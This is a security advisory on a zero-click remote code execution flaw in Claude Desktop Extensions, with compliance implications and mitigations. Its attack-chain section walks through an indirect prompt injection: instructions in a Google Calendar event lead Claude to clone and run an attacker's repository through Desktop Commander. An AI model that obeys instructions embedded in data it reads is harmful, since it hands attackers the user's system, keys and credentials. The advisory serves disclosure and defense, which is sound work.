Monachus Security Advisories
MNSA-2026-001

Zero-Click Remote Code Execution in Claude Desktop Extensions

Critical
Published
2026-02-09
Last Updated
2026-02-09
Prepared by
Monachus Solutions
Severity
Critical (CVSS 10.0)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWE
CWE-94
Affected Product
Claude Desktop with DXT Extensions
Affected Versions
All versions with DXT enabled
Fixed Versions
No patch available

Executive Summary

A critical zero-click remote code execution vulnerability in Claude Desktop Extensions (DXT) allows full system compromise through a weaponized Google Calendar event with no user interaction required. Published February 9, 2026 by LayerX Security researcher Roy Paz, the vulnerability exploits the absence of trust boundaries between read-only MCP connectors and high-privilege local executors.

Anthropic was notified through responsible disclosure and acknowledged the findings, but no remediation timeline has been provided as of the publication date. LayerX reports that Anthropic characterized the root cause as architectural rather than a localized bug. Organizations running Claude Desktop with DXT extensions face an immediate, unpatched threat that demands compensating controls or tool removal.

Vulnerability Details

FieldDetails
Vulnerability TypeZero-click Remote Code Execution
CVSS Score10.0 / 10.0 (self-assessed by LayerX)
CVE IDNot assigned
Affected ProductClaude Desktop with DXT extensions enabled
Attack VectorMalicious Google Calendar event (network-accessible, zero authentication)
Vendor ResponseAcknowledged; no remediation timeline provided
Estimated Exposure10,000+ active users; all 50 published DXT extensions

Attack Chain: How a Calendar Invite Achieves Full System Compromise

The attack chain, demonstrated with a working proof-of-concept, requires no adversarial prompt engineering, no obfuscation, and no social engineering beyond placing a single malicious calendar event on the target’s Google Calendar.

  1. Weaponized Calendar Event: An attacker creates a Google Calendar event (e.g., titled “Task Management”) containing plain-text instructions in the event description directing Claude to clone a malicious repository and execute its makefile.
  2. Routine User Prompt: A victim with Claude Desktop Extensions installed — including both a Google Calendar connector and a local executor like Desktop Commander — issues a routine prompt such as “Please check my latest events in Google Calendar and then take care of it for me.”
  3. Autonomous Tool Chaining: Claude autonomously reads the calendar event via the Google Calendar MCP connector, interprets the embedded instructions as actionable tasks, and forwards them to the Desktop Commander MCP extension, which executes git pull from the attacker’s repository and runs the retrieved makefile.
  4. Full System Compromise: The attacker achieves arbitrary code execution on the victim’s machine with full user privileges — access to SSH keys, AWS credentials, browser passwords, file systems, and OS settings.

KEY PREREQUISITE: A critical prerequisite limits universal exploitability: the victim must have both a Google Calendar MCP connector and a local code-execution connector installed, and must issue a sufficiently open-ended prompt. However, this combination is common among power users, and the attack surface — publicly accessible calendar events — is trivially reachable.

Anthropic’s Response and the Architectural Impasse

According to LayerX, Anthropic was approached with the findings and acknowledged the issue, but has not committed to a remediation timeline. LayerX reports that Anthropic characterized the root cause as architectural. No official public statement from Anthropic was found on their website, documentation, status page, or GitHub repositories as of the publication date — though the same-day timing of the disclosure may account for this.

The architectural root cause is that DXT extensions run unsandboxed with full system privileges — unlike Chrome extensions, which operate inside tightly sandboxed browser environments. All installed MCP connectors are treated as flat-privileged peers: Claude autonomously determines which connectors to chain together, with no hardcoded safeguards preventing a low-risk data connector from triggering high-privilege local execution.

This contrasts with Anthropic’s response to the “PromptJacking” vulnerabilities discovered by Koi Security in July 2025 (CVSS 8.9), which were fully patched in Claude Desktop v0.1.9 by September 19, 2025. The distinction is revealing: Anthropic has remediated localized code-level bugs but appears unwilling or unable to address systemic architectural deficiencies in how MCP connectors interact.

MCP Ecosystem Vulnerability Timeline

The LayerX finding is the latest in a cascading series of MCP security failures throughout 2025–2026. An independent analysis of 100 Claude MCP servers found critical security vulnerabilities in 43%.

DateIncidentSeverityResearcher
Apr 2025WhatsApp MCP tool poisoning: chat history exfiltrated via sleeper toolCriticalInvariant Labs
May 2025GitHub MCP prompt injection: private repo data exfiltrated via poisoned public issueCriticalInvariant Labs
Jun 2025MCP Inspector RCE (CVE-2025-49596): unauthenticated code execution via dev toolCriticalSecurity researchers
Jul 2025mcp-remote command injection (CVE-2025-6514, CVSS 9.6): 437K+ downloads affectedCriticalJFrog Security
Aug 2025Filesystem MCP Server sandbox escape (CVE-2025-53109/53110)CriticalCymulate
Sep 2025Malicious Postmark MCP server BCC’d all emails to attackerCriticalIT Pro
Oct 2025Smithery MCP hosting supply-chain breach: 3,000+ apps compromisedCriticalGitGuardian
Nov 2025Koi Security PromptJacking RCE (CVSS 8.9): patched in v0.1.9HighKoi Security
Jan 2026PromptArmor: Claude Cowork file exfiltration via prompt injectionHighPromptArmor
Feb 2026LayerX: zero-click Calendar to Desktop Commander RCE (CVSS 10)CriticalLayerX

Competitive Landscape: Trust Boundaries

Every major AI platform faces the fundamental tension of mixing untrusted external content with privileged system operations. Claude Desktop Extensions have the weakest sandboxing posture among the four platforms compared.

PlatformSandboxing PostureKey Defenses
Google (Strongest)Multi-tier sandboxingUser Alignment Critic model, macOS Seatbelt, Docker/Podman containers
Microsoft (Battle-tested)Defense-in-depthPrompt injection classifiers, instruction hierarchy, Entra ID scoping
OpenAI (Granular)Per-tool isolationOAuth 2.1 with PKCE, manual user confirmation for writes, tiered sandbox via MDM
Anthropic DXT (Weakest)No sandboxingExtensions run unsandboxed with full system privileges; no trust boundaries

Google (strongest): Chrome’s agentic browsing deploys a User Alignment Critic — a second, isolated Gemini model that independently vets every proposed agent action. Gemini CLI offers multi-tier sandboxing (macOS Seatbelt, Docker/Podman containers).

Microsoft (most battle-tested): Defense-in-depth combines prompt injection classifiers, instruction hierarchy training, and architectural containment via Entra ID identity scoping.

OpenAI (most granular): The Apps SDK enforces per-tool OAuth 2.1 scopes with PKCE, requiring manual user confirmation for write operations. Codex CLI provides tiered sandbox modes.

Anthropic DXT (weakest): Extensions run unsandboxed with full system privileges and no trust boundaries between connector types. Claude Code does implement OS-level sandboxing, demonstrating the capability exists but has not been applied to DXT.

SOC 2 Compliance Implications

Organizations using Claude Desktop with DXT extensions face material compliance exposure. A vendor that has acknowledged a CVSS 10.0 vulnerability without providing a remediation timeline creates an auditable condition requiring documented risk acceptance or tool removal.

CC6.1 / CC6.3 — Logical Access Controls

Absence of privilege separation between connector types violates least-privilege requirements. Auditors will examine whether AI tool permissions are documented with distinct privilege tiers.

CC7.1 / CC7.2 — System Operations

Zero-click, no-indicator attacks demand AI-specific behavioral monitoring, audit logs of all AI agent tool invocations, and anomaly detection for AI-initiated operations.

CC8.1 — Change Management

One-click DXT installation bypasses typical change management rigor. Each extension materially alters the attack surface and should require formal security review.

CC9.2 — Vendor Risk Management

Continuing to use a product with an acknowledged, unpatched CVSS 10.0 vulnerability may constitute a control deficiency. Auditors may issue an exception or qualified opinion absent robust compensating controls.

ISO 27001:2022 Compliance Implications

A.8.9 — Configuration Management

Default configuration allows unrestricted cross-connector chaining. Secure configuration baselines must enforce boundaries between connector types.

A.5.23 — Cloud Services Security

Google Calendar connector data flowing into local system execution is exactly the boundary this control requires organizations to manage.

A.8.8 — Technical Vulnerability Management

An unremediable CVSS 10.0 vulnerability must be managed through compensating controls, documented risk acceptance, or tool removal. ISO auditors could issue a nonconformity.

A.5.19 / A.5.22 — Supplier Relationships

Anthropic’s acknowledgment of the vulnerability without a remediation timeline must be documented and escalated through the supplier risk management process.

Immediate Mitigation Recommendations

Tier 1 — Immediate (Within 24–48 Hours)

  • Inventory: Conduct a full inventory of all Claude Desktop installations and their installed DXT extensions across the organization.
  • Identify risk combinations: Flag any systems running both an external-facing connector (Google Calendar, Gmail, cloud services) and a local executor (Desktop Commander, terminal, git, filesystem).
  • Sever the chain: On flagged systems, disable either the external connector or the local executor immediately. These two categories must not coexist on the same installation until Anthropic implements trust boundaries.
  • Isolate if required: If business requirements demand both capabilities, isolate Claude Desktop in a dedicated VM or container with no access to production credentials, sensitive files, or network resources.

Tier 2 — Short-Term (Within 1–2 Weeks)

  • EDR rules: Deploy endpoint detection rules monitoring Claude Desktop child processes for anomalous git operations, terminal execution, filesystem writes, and outbound connections to unknown endpoints.
  • Network controls: Restrict repositories and external resources accessible to Claude Desktop.
  • Policy controls: Configure enterprise Group Policy or MDM to blocklist high-risk DXT extensions where not strictly required.
  • Human-in-the-loop: Establish a mandatory policy requiring explicit user confirmation before any AI-initiated code execution.

Tier 3 — Medium-Term (Within 30 Days)

  • Risk register: Formally document a Critical severity entry with monthly review cadence.
  • Auditor memo: For SOC 2 or ISO 27001 certified organizations, prepare documentation of the vulnerability, Anthropic’s response, compensating controls, and formal risk acceptance signed by CISO.
  • Evaluate alternatives: Assess Claude Code (OS-level sandboxing), Google Gemini CLI (multi-tier sandbox), or OpenAI Codex (tiered sandbox with MDM enforcement).
  • Tabletop exercise: Conduct an AI-agent-mediated system compromise scenario to validate incident response readiness.

Tier 4 — Strategic

  • Monitor: Track Anthropic’s engineering blog and DXT documentation for architectural security improvements.
  • Engage vendor: Request a formal remediation timeline through enterprise support channels.
  • Industry participation: Contribute to OWASP’s Agentic Applications working group and incorporate AI agent tool-use security into vendor assessment frameworks.

Conclusion

This vulnerability crystallizes a systemic challenge facing the entire AI agent ecosystem: the trust boundary problem is architectural, not incidental. When an AI model autonomously decides which tools to chain together, and those tools span the spectrum from reading public calendar data to executing arbitrary system commands, every connected data source becomes an attack surface for full system compromise.

The critical insight is not that Claude Desktop has a bug — it is that the MCP connector architecture was designed for capability without corresponding security isolation. Anthropic’s willingness to patch localized code-level flaws while not yet addressing the systemic trust-boundary issue suggests an unresolved tension between usability and security in the agent-tool paradigm.

KEY TAKEAWAY: For organizations today, the calculus is straightforward: external-facing MCP connectors and high-privilege local executors must not coexist on the same Claude Desktop installation until Anthropic implements privilege separation, sandboxing, or mandatory confirmation gates for cross-connector tool chaining. The compliance implications are equally clear — a CVSS 10.0 vulnerability with unavailable remediation demands either compensating controls robust enough to satisfy auditors or removal of the tool from production environments.

References

  • LayerX Security: Claude Desktop Extensions RCE — layerxsecurity.com/blog/claude-desktop-extensions-rce/
  • Infosecurity Magazine: Claude Desktop Extensions Vulnerable to Web-Based Prompt Injection
  • Koi Security: PromptJacking Critical RCEs in Claude Desktop
  • JFrog Security: CVE-2025-6514 Critical MCP Remote RCE Vulnerability
  • AuthZed: A Timeline of Model Context Protocol Security Breaches
  • OWASP Top 10 for Agentic Applications (December 2025)
  • Anthropic: Responsible Disclosure Policy — anthropic.com/responsible-disclosure-policy
  • Anthropic Engineering: Claude Code Sandboxing
  • Noma Security: GeminiJack Zero-Click Vulnerability
  • Microsoft Learn: Security for Microsoft 365 Copilot
  • OpenAI: Apps SDK Security & Privacy; Codex Security
  • Greshake et al. (AISec@CCS 2023): Indirect Prompt Injection in LLM-Integrated Applications
  • InjecAgent (ACL 2024): Benchmarking Indirect Prompt Injections in Tool-Integrated LLM Agents
← Back to all advisories